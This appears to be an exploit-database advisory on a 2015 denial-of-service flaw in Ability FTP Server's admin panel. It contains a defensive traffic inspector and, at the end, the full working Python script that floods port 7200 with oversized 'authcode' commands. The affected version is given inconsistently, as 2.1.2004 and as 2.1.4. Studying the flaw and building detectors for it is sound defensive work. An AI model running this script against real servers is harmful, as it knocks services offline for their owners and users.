Vendor: Ability FTP Server
By: St0rn
CVSS: 7.5 (HIGH)
Remote Denial of Service
CWE: 400
Product Name: Ability FTP Server
Affected Version From: 2.1.2004
Affected Version To: 2.1.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:codecrafters:ability_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

Ability FTP Server Admin Panel AUTHCODE Command Remote Dos

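This exploit crashes the Ability FTP Server Admin Panel by sending a large number of 'authcode' commands to the server. The script reproduced below connects to the admin panel on TCP port 7200 and, in a loop, sends 'authcode' followed by 99999 filler characters with no line terminator. The exploit was discovered by St0rn in 2015 and affects version 2.1.4 of the Ability FTP Server.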

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the server to the latest version.
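
Until the patch is deployed, a network sensor can flag this traffic. The following is an added example, not part of the original advisory or of the vendor's code: a stream inspector for connections to the admin port that alerts on oversized 'authcode' arguments, including the unterminated form sent by the script on this page. The length limits and the assumption that admin commands are newline-terminated are illustrative, not taken from the product.

```python
ADMIN_PORT = 7200   # admin panel port the script on this page connects to
MAX_ARG = 64        # assumption: a legitimate auth code is short
MAX_LINE = 512      # assumption: no legitimate admin command is longer

class AdminStreamInspector:
    """Inspects client-to-server bytes of one TCP connection to ADMIN_PORT."""

    def __init__(self):
        self.pending = b""       # bytes seen since the last line terminator
        self.overflowed = False  # True while skipping a line already reported

    def _check_line(self, line):
        verb, _, arg = line.partition(b" ")
        if verb.lower() == b"authcode" and len(arg) > MAX_ARG:
            return ["oversized authcode argument: %d bytes" % len(arg)]
        return []

    def feed(self, chunk):
        """Consume one payload chunk and return the alerts it raised."""
        alerts = []
        *lines, self.pending = (self.pending + chunk).split(b"\n")
        for line in lines:
            if self.overflowed:  # tail of the line that was already reported
                self.overflowed = False
                continue
            alerts += self._check_line(line.rstrip(b"\r"))
        if self.overflowed:
            self.pending = b""   # still inside the over-long line: drop it
        elif len(self.pending) > MAX_LINE:
            # The script on this page never sends a terminator, so waiting for
            # end-of-line would buffer forever: alert once, then stop buffering.
            verb = self.pending.partition(b" ")[0][:16].decode("ascii", "replace")
            alerts.append("unterminated %r command exceeds %d bytes" % (verb, MAX_LINE))
            self.overflowed, self.pending = True, b""
        return alerts

def inspect_flow(dst_port, chunks):
    """Return all alerts for one connection; other ports are ignored."""
    if dst_port != ADMIN_PORT:
        return []
    inspector = AdminStreamInspector()
    return [a for chunk in chunks for a in inspector.feed(chunk)]

if __name__ == "__main__":
    # Constructed sample flows, not captured traffic.
    benign = [b"authcode 12", b"3456\r\n"]   # one command split across segments
    flood = [b"authcode " + b"a" * 1451] + [b"a" * 1460] * 3
    print(inspect_flow(ADMIN_PORT, benign))
    print(inspect_flow(ADMIN_PORT, flood))
```

The inspector raises one alert per over-long line rather than one per segment, and it keeps at most MAX_LINE bytes plus one segment in memory per connection.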

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title: Ability FTP Server Admin Panel AUTHCODE Command Remote Dos
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.codecrafters.com
# Software Link: http://www.codecrafters.com/AbilityFTPServer
# Version: 2.1.4
# Tested on: Windows 7
#

import socket
import sys
import os


def clear():
 os.system("cls")

def banner():
 print "############################################".center(80)
 print "#  Ability FTP Server Admin panel DoS       #".center(80)
 print "#             Author: St0rn                #".center(80)
 print "#      <fabien[at]anbu-pentest[dot]com>    #".center(80)
 print "############################################".center(80)
   
def createconn(ip):
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 try:
  s.connect((ip,7200))
 except:
  print "\n"
  print "[+] Server Down!".center(80)
  sys.exit(0)
 return s

def crash(sock):
 try:
  while 1:
   sock.send('authcode '+'a'*99999)
   sys.stdout.write('.')
 except:
  sock.close()

############### Main ###############
clear()
banner()

if len(sys.argv)==2:
 print "\n"
 print "Waiting before crash".center(80)
 print "(The server can be run without afsloader.exe)".center(80)
 while 1:
  s=createconn(sys.argv[1])
  crash(s)
else:
 print "\n"
 print "Usage: AftpAdminDos.py [Server IP]".center(80)
 sys.exit(0)